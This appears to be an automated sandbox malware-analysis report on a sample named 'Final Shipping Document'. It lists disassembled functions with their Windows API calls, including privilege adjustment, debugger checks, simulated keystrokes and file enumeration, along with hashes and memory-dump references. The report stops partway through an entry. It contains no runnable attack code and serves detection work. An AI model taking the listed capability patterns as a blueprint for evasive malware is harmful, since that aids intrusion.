                                                            • Opcode Fuzzy Hash: 1d5efb23e3ce66718bf6599e1137eda89f7d1b72f259f9a5eb42628f7edcd46f
                                                            • Instruction Fuzzy Hash: 09322574A007059FCB28CF59C481A6AB7F1FF48710B15C56EE5AADB3A1EB70E941CB44
                                                            Function 00C15C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C15CC1
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C15D17
                                                            • FindClose.KERNEL32(?), ref: 00C15D5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 10e73f78b89c2686e341bfd42b8dcfa986d3aad4a08f8f98a1b71a9a67db2ed6
                                                            • Instruction ID: 1c046a8a2bdf3da15263f5a339b286da1e62886ac0369e59f815134953d55f5c
                                                            • Opcode Fuzzy Hash: 10e73f78b89c2686e341bfd42b8dcfa986d3aad4a08f8f98a1b71a9a67db2ed6
                                                            • Instruction Fuzzy Hash: A951AA74604601DFC714DF28D494E9AB7E4FF8A314F14859DE96A8B3A1CB30ED44CB91
                                                            Function 00BD2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 00BD271A
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BD2724
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00BD2731
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 88eb1f8115306b7efdbc0460ea14270001452fd54937ba1d73828eaddfdd1f70
                                                            • Instruction ID: 860fe1091a5170ceca49bf5c4ddaa63c5cd0b47585db6e2913d739b6ca33a9a9
                                                            • Opcode Fuzzy Hash: 88eb1f8115306b7efdbc0460ea14270001452fd54937ba1d73828eaddfdd1f70
                                                            • Instruction Fuzzy Hash: AE31C375911218ABCB21DF64D888B9DBBF8AF18310F5041EAE81CA6260E7349F818F44
                                                            Function 00C151CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C151DA
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C15238
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00C152A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: bc35fd018812ab02f58b09bd5c15232dc8ad12ca0f12d26b566bdd0542a47ad9
                                                            • Instruction ID: ecea70beacaaa79f7df76143a708c9f9be3731f2a383d412937c24a950147f80
                                                            • Opcode Fuzzy Hash: bc35fd018812ab02f58b09bd5c15232dc8ad12ca0f12d26b566bdd0542a47ad9
                                                            • Instruction Fuzzy Hash: B8310975A10518DFDB00DF54D884BADBBB4FF49314F048099E805AB2A2DB32E956DB90
                                                            Function 00C016C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0668
                                                              • Part of subcall function 00BBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0685
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                            • GetLastError.KERNEL32 ref: 00C0174A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                            • String ID:
                                                            • API String ID: 577356006-0
                                                            • Opcode ID: 44aa795e7d4851a093d4b76381b665073208e49fcea0093dd7071736244021d8
                                                            • Instruction ID: 55c46544654ab315dcf84bd73a3fbce8df2d2fbc46b906f222ddf6ba6cd26f5a
                                                            • Opcode Fuzzy Hash: 44aa795e7d4851a093d4b76381b665073208e49fcea0093dd7071736244021d8
                                                            • Instruction Fuzzy Hash: 1611BCB2414205AFD718AF54DCC6EBEB7F9EB04714B24852EE46652281EBB0BC41CB20
                                                            Function 00C0D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C0D608
                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C0D645
                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C0D650
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID:
                                                            • API String ID: 33631002-0
                                                            • Opcode ID: 150d29fcee0224a9030ad4fa32ca7ee93fc34c3fdac2695aec24fba3db9b25a7
                                                            • Instruction ID: b0b3befe03c5f93058165c503aa83b9ab5f4b1bbce6d1eb59b29548eb503dee6
                                                            • Opcode Fuzzy Hash: 150d29fcee0224a9030ad4fa32ca7ee93fc34c3fdac2695aec24fba3db9b25a7
                                                            • Instruction Fuzzy Hash: B7118E71E01228BFDB108F95DC84FAFBBBCEB45B60F108111F914F7290C2704A018BA1
                                                            Function 00C01663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C0168C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C016A1
                                                            • FreeSid.ADVAPI32(?), ref: 00C016B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 7619bd968ccefae144ff6a5a084b0c2576cbb882c0fa5802a98d86747e89ab96
                                                            • Instruction ID: 79c4aea2ca6bae88156152c71e2be5ab9ab550ee019f5d7d1467c955376ad831
                                                            • Opcode Fuzzy Hash: 7619bd968ccefae144ff6a5a084b0c2576cbb882c0fa5802a98d86747e89ab96
                                                            • Instruction Fuzzy Hash: 03F0F47195030DFBDB00DFE4DD89AAEBBBCEB08704F504565E901E2181E774AA448B50
                                                            Function 00BC4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002,00000000,?,00BD28E9), ref: 00BC4D09
                                                            • TerminateProcess.KERNEL32(00000000,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002,00000000,?,00BD28E9), ref: 00BC4D10
                                                            • ExitProcess.KERNEL32 ref: 00BC4D22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 87b834bdc9266835b8fad67a61ba44f8ae88871cc2dba9dffffb2ee1fbd34164
                                                            • Instruction ID: 60df6a7bc4d1b63bdc8e415083fbd7fc0b3df4f7c6421c07e9409a182d2d712d
                                                            • Opcode Fuzzy Hash: 87b834bdc9266835b8fad67a61ba44f8ae88871cc2dba9dffffb2ee1fbd34164
                                                            • Instruction Fuzzy Hash: 0DE0B631010148ABCF11BF64DD5AF9C3BA9EB42791B104468FC069A232DB35DE52DB80
                                                            Function 00BDC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /
                                                            • API String ID: 0-2043925204
                                                            • Opcode ID: f649408127d0b9405462ceb2608cf798c10c50275e83c63b32769abf1dc8b3b1
                                                            • Instruction ID: 8d783af19e5fa6bbb9700a5a6c9e58725aa77ed95a588a0135b61d8dd0d34d85
                                                            • Opcode Fuzzy Hash: f649408127d0b9405462ceb2608cf798c10c50275e83c63b32769abf1dc8b3b1
                                                            • Instruction Fuzzy Hash: 8041287650021A6FCB249FB9CC89EBBBBF8EB84314F1042AAF905D7280F6709D41CB54
                                                            Function 00BFD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00BFD28C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID: X64
                                                            • API String ID: 2645101109-893830106
                                                            • Opcode ID: 2e3fbde773c5e97a32f94a0b61788dcaf3c8cd970739fd9dd6c995ec135414bd
                                                            • Instruction ID: 92bfef09a426d9a78583d7640dead04c39f90e8eb9bee6094f53b2254deefecb
                                                            • Opcode Fuzzy Hash: 2e3fbde773c5e97a32f94a0b61788dcaf3c8cd970739fd9dd6c995ec135414bd
                                                            • Instruction Fuzzy Hash: F5D0C9B481111DEBCB94DB90DCC8EEDB7BCBB04305F100191F106A2000D77495488F10
                                                            Function 00BCCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                            • Instruction ID: 28fd9abe0a919ddc4f8c218714fc4689e0a8bd6f737a7ffd3d81ef58f0a28711
                                                            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                            • Instruction Fuzzy Hash: 16021C71E002199BDF14CFA9C880BAEBBF1EF58314F2581ADD819E7384D731AE458B94
                                                            Function 00C168EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C16918
                                                            • FindClose.KERNEL32(00000000), ref: 00C16961
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 6a09158affe7b5c88b531b5060860b91d8bffba1f62e5765764420a2fb296663
                                                            • Instruction ID: 15d95bcd99a590975185353f0d4f88ddd60639b916c9ff7e11de74a72ddaebab
                                                            • Opcode Fuzzy Hash: 6a09158affe7b5c88b531b5060860b91d8bffba1f62e5765764420a2fb296663
                                                            • Instruction Fuzzy Hash: 811193316142109FC710DF29D484A5ABBE5FF85328F14C699E4698F3A2C731EC45CB91
                                                            Function 00C137B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C24891,?,?,00000035,?), ref: 00C137E4
                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C24891,?,?,00000035,?), ref: 00C137F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: d585da721279ba12508e538fcbc0d0adfc0db0faf1efc3ffae3d6a346fc56def
                                                            • Instruction ID: 762ffaaf9163f1779aaff96240948d3e5bb0d377f0e395aff6cf49adb1871a38
                                                            • Opcode Fuzzy Hash: d585da721279ba12508e538fcbc0d0adfc0db0faf1efc3ffae3d6a346fc56def
                                                            • Instruction Fuzzy Hash: 11F0E5B16043286AE720176A8C8DFEF3AAEEFC5765F000175F509E22D1DA609D44C7F0
                                                            Function 00C0B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C0B25D
                                                            • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00C0B270
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: InputSendkeybd_event
                                                            • String ID:
                                                            • API String ID: 3536248340-0
                                                            • Opcode ID: cb36356681be86a67f36abcfd8d3976367fed667c19a9ec1d6a3d7f6581646e2
                                                            • Instruction ID: a6d2353ff202d016ed39fb72d6e44f9dd1fdde587f1cf563bd503d639aa6cb50
                                                            • Opcode Fuzzy Hash: cb36356681be86a67f36abcfd8d3976367fed667c19a9ec1d6a3d7f6581646e2
                                                            • Instruction Fuzzy Hash: B5F0177181428EABDB05DFA1C806BAE7BB4FF08309F00800AF965A61A2C3798611DF94
                                                            Function 00C010BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C011FC), ref: 00C010D4
                                                            • CloseHandle.KERNEL32(?,?,00C011FC), ref: 00C010E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: c2353009076010f354130cc7363752c87e8d3cd82c5935bd90cb7c24a07a008e
                                                            • Instruction ID: 6ded50b1da2994825cf9fa37c1cd15e144fde1ffb9dbf13330cd15b5a9227d64
                                                            • Opcode Fuzzy Hash: c2353009076010f354130cc7363752c87e8d3cd82c5935bd90cb7c24a07a008e
                                                            • Instruction Fuzzy Hash: CEE0BF72014611AFE7252B51FC45FBB77E9EB04320B14886DF5A5904B1DBA2ACA0DB50
                                                            Function 00BACAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Variable is not of type 'Object'., xrefs: 00BF0C40
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable is not of type 'Object'.
                                                            • API String ID: 0-1840281001
                                                            • Opcode ID: 98bda2b2c6c40a3b6b439005ef3373e8ad3c052394ad67f66586fc44de097ec0
                                                            • Instruction ID: 1563426346c9d7938c9b85ca076f03f62d88bdf226c105a1401eb40f85b63c03
                                                            • Opcode Fuzzy Hash: 98bda2b2c6c40a3b6b439005ef3373e8ad3c052394ad67f66586fc44de097ec0
                                                            • Instruction Fuzzy Hash: CC3259749182189FCF14EF94C981AFDBBF5FF06304F1440A9E906AB292DB75AD49CB60
                                                            Function 00BD676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BD6766,?,?,00000008,?,?,00BDFEFE,00000000), ref: 00BD6998
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 944870938bd24d35eca142689e128dcebe3c8a702b520325399446ff924ffef7
                                                            • Instruction ID: e9b5acdc3b6853882e5f07dd56f154b7846074604275e1f5e335af621087ae34
                                                            • Opcode Fuzzy Hash: 944870938bd24d35eca142689e128dcebe3c8a702b520325399446ff924ffef7
                                                            • Instruction Fuzzy Hash: A4B14C316106099FD719CF28C486B65BBE0FF45364F25869AE8D9CF3A2D336E981CB40
                                                            Function 00BBB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
